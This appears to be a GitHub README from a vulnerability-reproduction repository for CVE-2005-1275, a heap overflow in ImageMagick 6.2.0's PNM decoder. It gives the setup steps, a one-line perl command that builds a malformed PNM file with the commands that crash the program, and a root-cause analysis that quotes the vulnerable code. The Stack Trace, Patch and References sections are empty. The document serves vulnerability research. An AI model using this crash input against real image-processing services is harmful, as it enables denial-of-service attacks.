Skip to content
Branch: master
Find file History
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
README.md
vuln.pnm

README.md

CVE-2005-1275

Experiment Environment

CentOS 6.5

INSTALL & Configuration

wget https://github.com/mudongliang/source-packages/raw/master/CVE-2005-1275/ImageMagick-6.2.0-8.tar.gz
tar -xvf ImageMagick-6.2.0-8.tar.gz
cd ImageMagick-6.2.0
./configure
make
sudo make install

Problems in Installation & Configuration

How to trigger vulnerability

perl -e 'print "P7\n1\n1 1\n1"' > vuln.pnm
export MALLOC_CHECK_=0
/usr/local/bin/identify vuln.pnm

or 

/usr/local/bin/mogrify vuln.pnm

PoCs

ImageMagick ReadPNMImage() Heap Overflow

ImageMagick PNM Image Decoding Remote Buffer Overflow Vulnerability

ImageMagick 6.x - '.PNM' Image Decoding Remote Buffer Overflow

Vulnerability Details & Patch

Root Cause

A heap overflow exists in ReadPNMImage() function, that is used to decode a PNM image files. The vulnerable code is:

coders/pnm.c:

static Image *ReadPNMImage(const ImageInfo *image_info,ExceptionInfo *exception)
{
...
    if ((format == '1') || (format == '4'))
      max_value=1;  /* bitmap */
    else
      max_value=PNMInteger(image,10);
    image->depth=max_value < 256 ? 8UL : QuantumDepth;
    if ((format != '3') && (format != '6'))
      {
        image->storage_class=PseudoClass;
        image->colors=(unsigned long) (max_value >= MaxColormapSize ?
          MaxColormapSize : max_value+1);
      }
...
        if (AllocateImageColormap(image,image->colors) == MagickFalse)
          ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed");
        if (format == '7')
          {
            /*
              Initialize 332 colormap.
            */
            i=0;
            for (pixel.red=0; pixel.red < 8; pixel.red++)
              for (pixel.green=0; pixel.green < 8; pixel.green++)
                for (pixel.blue=0; pixel.blue < 4; pixel.blue++)
                {
                  image->colormap[i].red=ScaleXToQuantum(pixel.red,0x07);
                  image->colormap[i].green=ScaleXToQuantum(pixel.green,0x07);
                  image->colormap[i].blue=ScaleXToQuantum(pixel.blue,0x03);
                  i++;
                }
          }
...

We can manipulate with image->colors value, becouse it`s atributted to "max_value" or MaxColormapSize variable. Allocation of memory for image->colormap is based on image->colors variable (AllocateImageColormap() function). If value of "image->colors" is for example 1, we allocate only 1sizeof(PixelPacket) bytes of memory. Next, when format of PNM file is "7", image->colormap buffer is initialized by 332 colormaps. If image->colorssizeof(PixelPacket) bytes are not enought for it, heap structures are overflowed. We cannot control contents of this buffer, so execute of arbitrary code is very difficult or imposible, but we can crash it in easy way.

Stack Trace

Patch

References

You can’t perform that action at this time.